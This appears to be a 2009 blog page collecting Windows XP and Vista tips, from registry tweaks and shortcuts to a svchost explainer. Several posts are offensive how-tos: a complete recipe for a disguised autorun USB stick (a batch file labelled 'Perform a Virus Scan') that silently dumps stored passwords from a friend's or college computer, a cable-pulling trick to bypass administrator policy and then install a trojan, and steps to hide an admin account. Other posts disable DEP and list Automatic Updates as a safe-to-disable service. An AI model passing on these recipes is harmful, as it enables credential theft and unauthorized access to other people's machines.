WELCOME GUEST ENJOY YOUR STAY HERE...

TELL A FRIEND ABOUT US.. Share/Save/Bookmark
Showing posts with label windows. Show all posts
Showing posts with label windows. Show all posts

Wednesday, September 16, 2009

Force windows XP to reboot upon crashing

This registry edit will cause your system to reboot itself automatically upon crashing. This can be useful if you have a reason for keeping your system on 24 /7:
Open REGEDIT
Navigate to 'HKEY_LOCAL_MACHINE\SYSTEM
\CurrentControlSet\Control\C rashControl'
Edit the 'AutoReboot' value to '1'

How to Write a Windows XP Driver

Summary: This document describes the steps you should take to create a Microsoft® Windows® XP driver for your device.
To create a Windows XP device driver:
1. Install the current Windows DDK. Read the system requirements and installation instructions in the stand-alone Getting Started HTML file supplied with the DDK.
2. Read Getting Started with Windows Drivers. This document guides you through the planning and decision-making process involved in making a Windows device driver from design through distribution. You should also look through the DDK documentation for device-type- specific information.
The DDK documentation set has the following device-type- specific nodes:
· Battery Devices
· Display and Print Devices
· IEEE 1284.4 Devices
· Interactive Input Devices
· Modem Devices
· Multifunction Devices
· Network Devices and Protocols
· Parallel Ports and Devices
· Serial Ports and Devices
· Smart Card Devices
· Still Image Devices
· Storage Devices
· Streaming Devices (Video and Audio)
· Devices Requiring VDDs
3. IDE bus are described in System Support for Buses. Driver development for most device types also requires a strong understanding of Windows operating system fundamentals, which are described in Kernel-Mode Driver Architecture.
4. Look through the driver source code provided with the DDK for a sample that represents your device type. Use the sample code where possible, modifying it for your device's specifics.
5. The sample code can enhance your understanding of Windows XP driver implementation requirements and speed your development time.
6. Compile and build your driver. This should be done using the Build utility and not some other compiler, because the Build utility has certain features that are necessary for driver development.
7. Obtain a checked build of Windows XP, so that you can test and debug your driver using free and checked system builds.
8. The checked build of Windows XP provides extensive kernel- mode debugging capabilities not available in the free build.
9. Create an INF file so that you can install and test your driver.
10. Test and debug your driver. You should use Driver Verifier, a program that puts your driver through a variety of tests, stresses, and deliberate failures in order to test its response and reliability in many extreme situations. You should also use a debugger. Microsoft provides several powerful debuggers that can monitor and debug kernel-mode and user-mode drivers. Using Driver Verifier in conjunction with these debuggers, on both the checked and free versions of the operating system, can be a powerful way to test your driver.
11. Provide an installation package so that customers can install devices that use your driver.
12. Submit your driver and installation package to Microsoft so that it can be digitally signed.
There are many resources available to you while developing your driver. The following sites describe some of the support available to you:
a. http://www.microsoft.com/ddk describes how to obtain the current DDK and provides other information, such as a driver development reading list.
b. http://www.microsoft.com/hwdev provides information, such as device-type-specific white papers and late-breaking news, and a list of resources available to driver developers.
c. http://support.microsoft.com/ support/ddk contains DDK product support information.

Monday, September 14, 2009

Remove Hidden Shares from Win32 Boxes

NetBIOS open way for many Intruders if the port is open in a LAN, by default the port number for the NetBOS would be 139, and if it is in open state, then the hackers can take advantage over the default hidden share present in windows box specifically the IPC$ share, ( IPC - Inter Process Connect ), here the attacker can exploit this just by using the 'net use' command that is shiped with the windows machine itself, they will juts use the 'net use ' command and will establish a remote connection via IPC$ and once done, they can remotely create user account on the compromised box and can establish a telnet connection and can easily root the box. Here is a counter measure that can be taken to avoid this sort of attack, By default Windows 2000, Windows XP and WinNT automatically enables the hidden shares (admin$, c$, d$ and IPC$ - Inter Process Connect ). The following Registry Key will help you in disabling the Hidden shares. System Key: [HKEY_LOCAL_MACHINE > System > CurrentControlSet > Services > LanmanServer > Parameters]
Value Name: AutoShareWks
Data Type: REG_DWORD (DWORD Value)
Value Data: (0 = disable shares, 1 = enable)
Goto Run and type compmgmt.msc, this will take you to the computer management, here Click on 'shared folders' and then 'share' then delete the shares that you want to remove. Note : To remove the admin share for only the current session use the second method (Computer Management console), if you want a permanent removal, add the AutoShareWks in the registry.

Disable Data Execution Prevention (DEP) in Vista.

Data Execution Prevention (DEP) is a security feature that can help prevent damage to your computer from viruses and other security threats. Harmful programs can try to attack Windows by attempting to run (also known as execute) code from system memory locations reserved for Windows and other authorized programs. These types of attacks can harm your programs and files. DEP can help protect your computer by monitoring your programs to make sure that they use system memory safely. If DEP notices a program on your computer using memory incorrectly, it closes the program and notifies you. It is as such a security feature.
Type cmd in Vista's search bar. Rt click on search results 'cmd' and click on Run as Administrator. Then copy paste
bcdedit.exe /set {current} nx AlwaysOff
and hit enter. Reboot.
To enable back DEP, type instead:
bcdedit.exe /set {current} nx AlwaysOn
Thats it !

Sunday, September 13, 2009

svchost.exe procees explored

You are no doubt reading this article because you are wondering why on earth there are nearly a dozen processes running with the name svchost.exe. You can't kill them, and you don't remember starting them... so what are they? So What Is It? According to Microsoft: "svchost.exe is a generic host process name for services that run from dynamic-link libraries". Could we have that in english please? Some time ago, Microsoft started moving all of the functionality from internal Windows services into.dll files instead of.exe files. From a programming perspective this makes more sense for reusability... but the problem is that you can't launch a.dll file directly from Windows, it has to be loaded up from a running executable (.exe). Thus the svchost.exe process was born. Why Are There So Many svchost.exes Running? If you've ever taken a look at the Services section in control panel you might notice that there are a Lot of services required by Windows. If every single service ran under a single svchost.exe instance, a failure in one might bring down all of Windows... so they are separated out. Those services are organized into logical groups, and then a single svchost.exe instance is created for each group. For instance, one svchost.exe instance runs the 3 services related to the firewall. Another svchost.exe instance might run all the services related to the user interface, and so on. So What Can I Do About It? You can trim down unneeded services by disabling or stopping the services that don't absolutely need to be running. Additionally, if you are noticing very heavy CPU usage on a single svchost.exe instance you can restart the services running under that instance. The biggest problem is identifying what services are being run on a particular svchost.exe instance... we'll cover that below. If you are curious what we're talking about, just open up Task Manager and check the "Show processes from all users" box:
Checking From the Command Line (Vista or XP Pro) If you want to see what services are being hosted by a particular svchost.exe instance, you can use the tasklist command from the command prompt in order to see the list of services.
tasklist /SVC
The problem with using the command line method is that you don't necessarily know what these cryptic names refer to. Checking in Task Manager in Vista You can right-click on a particular svchost.exe process, and then choose the "Go to Service" option.
This will flip over to the Services tab, where the services running under that svchost.exe process will be selected:
The great thing about doing it this way is that you can see the real name under the Description column, so you can choose to disable the service if you don't want it running. Using Process Explorer in Vista or XP You can use the excellent Process Explorer utility from Microsoft/Sysinternals to see what services are running as a part of a svchost.exe process. Hovering your mouse over one of the processes will show you a popup list of all the services:
Or you can double-click on a svchost.exe instance and select the Services tab, where you can choose to stop one of the services if you choose.
Disabling Services Open up Services from the administrative tools section of Control Panel, or type services.msc into the start menu search or run box. Find the service in the list that you'd like to disable, and either double-click on it or right-click and choose Properties.
Change the Startup Type to Disabled, and then click the Stop button to immediately stop it.
You could also use the command prompt to disable the service if you choose. In this command "trkwks" is the Service name from the above dialog, but if you go back to the tasklist command at the beginning of this article you'll notice you can find it there as well.
sc config trkwks start= disabled Hopefully this helps somebody!

Undo an Accidental Move or Delete With a Keyboard Shortcut

Have you ever accidentally deleted the wrong file, or duplicated files while trying to select them with the mouse? Those types of mistakes can be extremely frustrating, but there's a really, really simple way to reverse them. All you have to do is use the Ctrl+Z keyboard shortcut, or use Edit \ Undo on the menu.
This is especially handy when you are trying to select a bunch of files, and accidentally move the mouse and copy them into the same folder instead:
Once you do that, just immediately use the Ctrl+Z shortcut and the files will be removed, although you will get the regular delete confirmation dialog:
This can be confusing, but since the accidentally copied file is now going to be removed permanently, it makes sense that you'll have to accept the deletion. Also note that this works in any version of Windows.

Saturday, September 12, 2009

Show your name on SYSTEM CLOCK

This tip is absolutely and completely useless, and will even make applications that depend on timestamps have issues. It's mostly just to be used as a cool trick you can show off to your friends, so we're going to show you how it works. The way this trick works is by modifying the regional settings for the time format. Instead of using just AM or PM, you can put up to 12 characters of text in that field.
Start by opening Regional and Language Options from the start menu search box or the control panel.
On the Formats tab you'll see the "Customize this format" button, which you'll need to choose.
Select the Time tab, and then here's where we can make whatever settings we want.
I chose to set mine to "AM - Geek" so I could still see AM or PM, but you can choose any 12 characters for either field. Keep in mind that the PM symbol is only going to display during the "PM" hours. This does change more than just the displayed clock, so I'd advise not using this on a computer you do actual work on. Using the F5 key in notepad shows the "Geek" text as well:
It's one of those things that's interesting to know... just not very useful. It does work in XP as well.

6 mistakes new Windows administrators make

#1: Trying to change everything all at once
When you come into a new job, or start working with a new technology, you may have all sorts of bright ideas. If you're new to the workplace, you immediately hone in on those things that your predecessors were (or seem to have been) doing wrong. You're full of all the best practices and tips and tricks that you learned in school. If you're an experienced administrator coming from a different environment, you may be set in your ways and want to do things the way you did them before, rather than taking advantage of features of the new OS. Either way, you're likely to cause yourself a great deal of grief. The best bet for someone new to Windows networking (or to any other job, for that matter) is give yourself time to adapt, observe and learn, and proceed slowly. You'll make your own job easier in the long run and make more friends (or at least fewer enemies) that way.
#2: Overestimating the technical expertise of end users
Many new administrators expect users to have a better understanding of the technology than they do. Don't assume that end users realize the importance of security, or that they will be able to accurately describe the errors they're getting, or that they know what you mean when you tell them to perform a simple (to you) task such as going to Device Manager and checking the status of the sound card. Many people in the business world use computers every day but know very little about them beyond how to operate a few specific applications. If you get frustrated with them, or make them feel stupid, most of them will try to avoid calling you when there's a problem. Instead they'll ignore it (if they can) or worse, try to fix it themselves. That means the problem may be far worse when you finally do become aware of it.
#3: Underestimating the technical expertise of end users
Although the above applies to many of your users, most companies will have at least a few who are advanced computer hobbyists and know a lot about technology. They're the ones who will come up with inventive workarounds to circumvent the restrictions you put in place if those restrictions inconvenience them. Most of these users aren't malicious; they just resent having someone else in control of their computer use - especially if you treat them as if they don't know anything. The best tactic with these users is to show them that you respect their skills, seek out their input, and let them know the reasons for the rules and restrictions. Point out that even a topnotch racecar driver who has demonstrated the ability to safely handle a vehicle at high speed must abide by the speed limits on the public roads, and it's not because you doubt his/her technology skills that you must insist on everyone following the rules.
#4: Not turning on auditing
Windows Server operating systems have built-in security auditing, but it's not enabled by default. It's also not one of the best documented features, so some administrators fail to take advantage of it. And that's a shame, because with the auditing features, you can keep track of logon attempts, access to files and other objects, and directory service access.
Active Directory Domain Services (AD DS) auditing has been enhanced in Windows Server 2008 and can be done more granularly now. Without either the built-in auditing or third-party auditing software running, it can be almost impossible to pinpoint and analyze what happened in a security breach.
#5: Not keeping systems updated
This one ought to be a no- brainer: Keeping your servers and client machines patched with the latest security updates can go a long way toward preventing downtime, data loss, and other consequences of malware and attacks. Yet many administrators fall behind, and their networks are running systems that aren't properly patched. This happens for several reasons. Understaffed and overworked IT departments just may not get around to applying patches as soon as they're released. After all, it's not always a matter of "just doing it" - everyone knows that some updates can break things, bringing your whole network to a stop. Thus it's prudent to check out new patches in a testbed environment that simulates the applications and configurations of your production network. However, that takes time - time you may not have. Automating the processes as much as possible can help you keep those updates flowing. Have your test network ready each month, for instance, before Microsoft releases its regular patches. Use Windows Server Update Services (WSUS) or other tools to simplify and automate the process once you've decided that a patch is safe to apply. And don't forget that applications - not just the operating system - need to be kept updated, too.
#6: Getting sloppy about security
Many administrators enforce best security practices for their users but get sloppy when it comes to their own workstations. For example, IT pros who would never allow users to run XP every day logged on with administrative accounts think nothing about running as administrators themselves while doing routine work that doesn't require that level of privileges.

Wednesday, September 9, 2009

Enable Equalizer in Windows media Player 12

We all know that the next version of Windows Media Player , which is WMP12 , comes with the upcoming OS from Microsoft, Windows 7. I happened to install the first beta, and when I tried to set the equalizer in WMP12 , I couldn't find it anywhere.
I searched every menu and preferences, but it wasn't there in any of them. Just when I thought its not there in the beta version, I finally saw the Graphic Equalizer button, in a tricky way!
It is a bit tricky, but it is possible to get the equalizer in Windows Media Player 12. If you are also one of those looking for the equalizer in WMP 12 , follow the steps below to get one.
1. Open Windows Media Player 12 in Library View (Default View).
2. Press Alt to get the menu, and navigate to View > Skin Chooser.


3. Select 'Revert' skin from the skins list (left side) and press the "Apply Button" button.


4 . You can now see the "Graphic Equalizer" button at the bottom right of the skinned WMP12.


5 . Set the default equalizer options to whatever you like.


Unfortunately, I couldn't find any way to enable the SRS- WOW effects. May be they haven't included them in the beta version.

Thursday, August 27, 2009

Hack Passwords Using USB Drive

Today I will show you how to hack Passwords using an USB Pen Drive. As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to hack passwords from your friend's/college Computer. We need the following tools to create our rootkit. MessenPass : Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4 .x/2003 , AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM. il PassView : Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002 /2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts. IE Passview : IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0 , as well as older versions of Internet explorer, v4.0 - v6.0 Protected Storage PassView : Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more... PasswordFox : PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename. Here is a step by step procedre to create the password hacking toolkit. NOTE: You must temporarily disable your antivirus before following these steps. 1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive. ie: Copy the files - mspass.exe , mailpv.exe , iepv.exe , pspv.exe and passwordfox.exe into your USB Drive. 2. Create a new Notepad and write the following text into it [autorun]
open=launch.bat
ACTION= Perform a Virus Scan save the Notepad and rename it from New Text Document.txt to autorun.inf Now copy the autorun.inf file onto your USB pendrive. 3. Create another Notepad and write the following text onto it. start mspass.exe /stext mspass.txt start mailpv.exe /stext mailpv.txt start iepv.exe /stext iepv.txt start pspv.exe /stext pspv.txt start passwordfox.exe /stext passwordfox.txt save the Notepad and rename it from New Text Document.txt to launch.bat Copy the launch.bat file also to your USB drive. Now your rootkit is ready and you are all set to hack the passwords. You can use this pendrive on your friend's PC or on your college computer. Just follow these steps 1 . Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive). 2. In the pop-up window, select the first option ( Perform a Virus Scan ). 3. Now all the password hacking tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files. 4. Remove the pendrive and you'll see the stored passwords in the .TXT files. This hack works on Windows 2000, XP,Vista and 7
NOTE: This procedure will only recover the stored passwords (if any) on the Computer.

Friday, August 14, 2009

Create Hidden Admin Account in XP

Since we are going to do all the Editing in Window Registry it is Recommended to Back Up the Registry before going Further. After you have Backed up your registry follow the Steps to Create your Hidden Account:
First Goto Start -> Run -> Type regedit -> Enter
In the Left Menu goto,
HKEY_LOCAL_MACHINE\Softwa re\Microsoft\WindowsNT\Curre ntVersion\Winlogon\SpecialAcc ounts\UserList
In the Right pane, Right click -> New -> String Value
Right click on the new String Value and click Rename
Type the Name of the Account you want to hide.
Hit Enter then Right click on the String Value again and Change value to 0 which hides it. If you want it to be Visible to all Enter the Value 1.
Now Save and Exit the Registry and Logoff.
Goto welcome screen and Hit ctrl+ alt+del twice to bring up Logon prompt
Type hidden Accounts name and password
Enjoy!!!

Sunday, August 2, 2009

15 Top Secrets of Windows XP (Tutorial)

1. Useful key shortcuts available:
- Windows key + D - shows the desktop
- Windows key + M - minimizes all open windows
- Windows key + Shift + M - maximizes all open windows
- Windows key + E - Runs Windows Explorer
- Windows key + R - shows the RUN dialog
- Windows key + F - shows Search window
- Windows key + Break - shows System Properties box
- Windows key + TAB - Go through taskbar applications
- Windows key + PAUSE Display the System Properties dialog box
- Windows key + U Open Utility Manager
- ALT + TAB - Cycle through opened applications
- Hold down CTRL while dragging an item to Copy it
- CTRL + ESC Display the Start menu
- ALT + ENTER View the properties for the selected item
- F4 key Display the Address bar list in My Computer or
- NUM LOCK + Asterisk (*) Display all of the subfolders that are under the selected folder
2. Lock Windows to protect computer
You can lock Windows to protect the computer when leaving the station easily by creating a shortcut with the path rundll32 .exeuser32 .dll, LockWorkStation. The Windows key + L is also a shortcut to this feature.
3. Edit sysoc.inf to list all software
To show all software that can be removed from your computer (including protected Windows services), you can manually edit (using notepad for example) the sysoc.inf file located in Windows\inf\. Just remove the word hide next to the software pack.
*Note* - use this at your own risk. Removing critical components of the system will make Windows instable.
4 . Windows XP comes with IPv4 and IPv6
Windows XP comes both IPv4 and IPv6 support. To enable IPv6 , you can install the protocols needed with the command "ipv6 install" in the command-prompt. Then type ipv6 /? to see the options. The installation will not remove the IPv4 protocols so your current configuration will still work.
5. Access Task Manager with shortcut
To access the Task Manager easier, you can make a shortcut that points to %windir%\system32\taskmgr.e xe.
6. Stop treating ZIP files like Folders
If you don't want your Windows XP to treat ZIP files like folders, you can disable this component by running regsvr32 /u zipfldr.dll at the command prompt or Run dialog. If you start missing it, you can enable it by typing regsvr32 zipfldr.dll.
7. Run program as diffrent user
You can run a program as a different user. Right click an application and select Run As command.
8. Switch users leaving applications opened
You can switch users leaving the applications opened too (*NOTE* use this only when needed since it could lead to system instability).
Go to Task Manager - processes and end the process explorer.exe. This will end only your session and not all applications. Then go to Applications tab, click New task and type runas /user:domainname\username explorer.exe. A password prompt will appear to login to the desired username. The user's session will start, with all your previously applications running.
I recommend to open first a command-line prompt and type runas /? to see all the options available.
9. Rename multiple files in Windows at once
Rename multiple files in Windows at once. Select them all, right click and select Rename. Enter the desired name. They will be renamed using what you specified, with a number in brackets to distinguish them.
10. Task kill feature in Windows
Windows has a task kill feature similar to Linux. Go to a command prompt and run the command tasklist to see running processes with PID numbers. Then type tskill to end the specific task. This forces an instant closing of the task.
11. Edit features with GPEDIT.MSC
You can edit many features by running gpedit.msc. You can add log on/log off scripts here and many features.
12. Edit accounts in the command prompt
You can edit accounts by running "control userpasswords2" at the command prompt.
13. Use systeminfo.exe to see System Information
You can use the systeminfo.exe command in the command prompt to see System Information, including all Windows updates and hotfixes.
14. Disable system services for maximum performance
There are system services that you can disable to free up the system's load. To access the interface that permits you to make changes to system's services, type services.msc and the command prompt.
This is a list of services that are *usually* useless and can be safely disabled.
Alerter
Application Layer Gateway Service,
Application Management
Automatic Updates
Background Intelligent Transfer
Clipbook
Distributed Link Tracking Client
Distributed Transaction Coordinater
Error Reporting Service
Fast User Switching Compatibility
IMAPI CD-Burning
Indexing Service
IPSEC Services
Messenger
Net Logon
Net Meeting
Remote Desktop Sharing
Network DDE
Network DDE DSDM
Portable Media Serial Number
Remote Desktop Help Session Manager
Remote Registry
Secondary Logon
Smartcard
SSDP Discovery Service
Uninterruptible Power Supply
Universal Plug and Play Device Host
Upload Manager
Webclient
Wireless Zero Configuration
WMI Performance Adaptor
*NOTE*: Make sure you don't need them since some applications you're using could depend on them. If you make any application to fail by disabling any of the services, go back and enable it again.
15. Repair Windows XP by using the XP installation CD
If your system failes to start due to an error related to missing HAL.DLL, invalid Boot.ini or any other critical system boot files you can repair this by using the XP installation CD. ...

How To Reset, Retrieve Windows Xp User Password if forgotten or losted.

IF U R IN TROUBLE ? LOST YOUR XP LOGIN USERNAME AND PASSWORD......
============================== ==================== ===================
You can get in to anu user account if you are using windows administrative account its a simple methord !
STEP 1. CLCIK - START MENU !
STEP 2. TAKE " RUN "
STEP 3. RUN " mmc " - M icrosoft M anagement C onsole
There u get a new NEW WINDOW - name Console
STEP 4. Click FILE TAB
STEP 5. TAKE " ADD / REMOVE "
STEP 6. Click " Add.. " - (Child window)
STEP 7. " Add Local User and Groups " From the category
STEP 8. THEN CLICK - OK
STEP 9. CLICK USER
Now u can see all USER account
STEP 10. Right Click on any user u want to change !
STEP 11. Choose " Set Password "
STEP 12. Type NEWPASSWORD - and click OK !
Process Over ! Now you can Logout.... then Login with other user ( that u change password ) with Newpassword !
Enjoy...

Remove "Uninstallable" XP Utilities

Think you can't uninstall Windows Messenger, WordPad, and similar components? Think again. This hack shows you how. Windows has always had a problem with uninstalling software, and it's particularly poor at uninstalling its own utilities, such as WordPad or Windows Messenger. Uninstalling these utilities can free up hard- disk space if your hard disk is starting to fill up. And if you never use Windows Messenger, you most likely will want to uninstall it because the program frequently launches itself automatically even after you've shut it down repeatedly, kind of like Dracula returning from the dead. It won't bother you any longer if you uninstall it. To remove XP utilities and components, you normally choose Control Panel Add or Remove Programs Add/Remove Windows Components to get to the Windows Components Wizard, shown in Figure 2-12 . To uninstall a utility or component, just follow the wizard's instructions. Figure 2-12. The Windows Components Wizard
Ah, but there's a catch. A number of Windows utilities and componentsnotably Windows Messenger and WordPaddon't show up in the Windows Components Wizard so there's no apparent way to uninstall them. But you can, in fact, remove these components. XP has a Setup Information file that controls what appears in the Windows Components Wizard. If you edit this file, you can force these components to appear in the wizard, and then you can remove them as you would any others. To start, use Notepad or another text editor to open the Setup Information file, sysoc.inf, which is generally found in the C:\WINDOWS\INF folder. For safety's sake, make a backup of the file before editing it, so you can revert to it if you need to. You should also set up a system restore point before making the changes. To set up a system restore point, choose Control Panel Performance and Maintenance System Restore and follow the instructions.
C:\WINDOWS\INF is a hidden folder, so if you want to view its contents, you will have to enable hidden folders by going into Windows Explorer and choosing Tools Folder Options View Show Hidden Files and Folders.
When you open the file, look for the line describing the program you want to uninstall. Lines in the file have the format:program=program.dll,O cEntry,program.inf,,numeral
Programs that are uninstallable have the word hide (or HIDE) embedded in the string. When this word is included in the string, the program won't show up in the Windows Components Wizard. The Pinball game entry, which doesn't show up in the wizard, looks like this:Pinball=ocgen.dll,OcEntry,p inball.inf,HIDE,7
To force it to show up in the wizard, remove the word HIDE from the entry that refers to the component you want to remove. For example, if you want to remove Pinball, edit its entry to this:Pinball=ocgen.dll,OcEntry,p inball.inf,,7
Save the sysoc.inf file, then run the Windows Components Wizard. The component will now show up in the wizard. Remove it as you would any other component. Keep in mind that not all of the entries in sysoc.inf are as easy to understand as Pinball and WordPad. For example, if you want to remove Windows Messenger, look for the entry that starts with the text msmsgs. If you want to remove the Accessibility Wizard, look for the entry for AccessOpt. Table 2-4 lists the "uninstallable" programs and their entries in the sysoc.inf file. Table 2-4. "Uninstallable" programs and their sysoc.inf entries Entry What entry refers to
AccessOpt Accessibility Wizard
MultiM Multimedia components, including Media Player, Volume Control, and Sound Recorder
CommApps Communications components, including Chat, Hyperterminal, and Phone Dialer
AutoUpdate Windows Automatic Update
TerminalServer Terminal Server
dtc Distributed Transaction Coordinator
dom COM+
WBEM Windows Management Instrumentation
Pinball Pinball game
MSWordPad WordPad
msmsgs Windows Messenger
You might run into a few gotchas when trying to remove "uninstallable" components. On some systems, you simply won't be able to remove Windows Messenger because Windows Messenger won't show up on the Windows Components Wizard even after you edit the sysoc.inf file. And some components, such as Terminal Server, will show up in the wizard if you edit the sysoc.inf file, but the wizard still won't let you uninstall them. 2.9.1. Hide Components You Don't Want to Be Uninstalled You can use this same technique in reverse to hide components you don't want to be uninstalled accidentally. Simply put the word HIDE in the proper place in the entry that you don't want to show up in the Windows Components Wizard. For example, if you want to hide the uninstall entry for the fax utility, edit its entry by changing:Fax=fxsocm.dll,FaxOc mSetupProc,fxsocm.inf,,7
to:Fax=fxsocm.dll,FaxOcmSetup Proc,fxsocm.inf,HIDE,7

Boot Disks For ALL Windows

BootDisks
01-Bootdisk Essentials
02 -Bootdisk for MS-DOS V5.00
03 -Bootdisk for MS-DOS V6.00
04 -Bootdisk for MS-DOS V6.20
05 -Bootdisk for MS-DOS V6.21
06 -Bootdisk for MS-DOS V6.22
07 -Bootdisk for Win98 SE (MS- DOS V7.10)
08 -Bootdisk for Windows 95a
09 -Bootdisk for Windows 95b
10 -Bootdisk for Windows 98 Custom No Ramdrive
11 -Bootdisk for Windows 98 Second Edition
12 -Bootdisk for Windows 98 Second Edition Custom No Ramdrive
13 -Bootdisk for Windows 2000 Advanced Server
14 -Bootdisk for Windows 2000 Professional
15 -Bootdisk for Windows 2000 Server
16-Bootdisk for Windows Millenium
17-Bootdisk for Windows Millenium Custom No Ramdrive
18 -Bootdisk for Windows NT 4.0 Server
19 -Bootdisk for Windows NT 4.0 Terminal Server Edition
20 -Bootdisk for Windows NT 4.0 Workstation
21-Bootdisk for Windows XP Custom Install Disk
22-Bootdisk for Windows XP System Setup Disk
Download all in 1 from here
CLICK HERE TO DOWNLOAD

Friday, July 31, 2009

Breaking the Restrictions of the Administrator

This works on WIn 2000 & WIN XP.
Dis can be used to gain access to the website you want to
for free, and how you can gain access to 'control panel', and the various
other tools of Widows that may have been blocked from your grasp like 'regedit' by the administrator. IT can be used in schools & colleges..
When u are at the log on screen, type in your username and
password. NOW When you hit enter, and it comes up with
the next screen, the rectangle one, immediatly pull out the network
cable i.e. the cable wire.
Now u can log on without any restrictions because when the cable is pulled off then it does not download any settings from the server. Now you have access to control panel, & all the other features which had been blocked BUT there will be no
network access. But that's cool because now we can access 'Internet options',
click in the 'connections' tab click the LAN settings, click the proxy
settings, and in the little white box at the bottom we can specify websites
that bypass the proxy server (eg www.yahoo.com) Now once you have changed
the settings to what you wish, apply them and restart the computer. Now get someone else to log onto it because if you log in it will load the cached settings from your previous log in, then after the other person logs in, everyone that logs in after them included themselves will have the
internet settings you specified.
Its only an 'Unplugging technique' to gain access to a comp. locked by the administrator.
Now you can gain access to msconfig, regedit, command etc disable the virus scanner, or to install a trojan or a virus according to u're will..
XP HOME ADVANCED FILE PERMISSIONS.!!
Access *Advance file Permissions* on NTFS file systems for XP Home simply by booting into *Safe Mode*, rt-clicking any file or folder, and navigating to the *Security tab*. This gives the user the ability to allow or deny read, write, execute, read & write, display contents, full-control, iheritance, and take ownership permissions, with many more options available to apply to different users and groups stored on the computer. Well, you don't have to do this in *Safe Mode* (XP Home). Although it is a little less intuitive, you can simply go to your command prompt - Start>All Programs>Accessories> Command Prompt. Now type "cacls" in the window (without the quotes). This gives you the ability to add, remove or modify file permissions on files and folders through the command prompt. Type "cacls /?" for help on different options and variables. You do not need to be in safe mode to use this so it makes it a little quicker than using the safe mode security tab GUI. Remember - this only applies to NTFS. Here also is a very useful link to find a lot of extras and tweaks straight from the horse's mouth - the Microsoft Resource Center. You will find a lot of very useful web-based extra's here, most of them left unknowing to the general public - such as, "Online Crash Analysis" - a site that looks like Windows Update but you can upload your crash "dump logs" (when you get those system or application crash error reports). Microsoft will then analyze the log file and tell you some more info about WHY the system crashed (ie. faulty hardware/software/confl icts, etc).

Follow Me... Stay Connected

MY STATS

Top Blogs

Learn hacking tips tricks earn online hints cheats

Blog Directory & Search engine

blogarama - the blog directory

BlogsByCategory.com

Technology Blogs - Blog Rankings

Visit blogadda.com to discover Indian blogs

Computers

Computers Blogs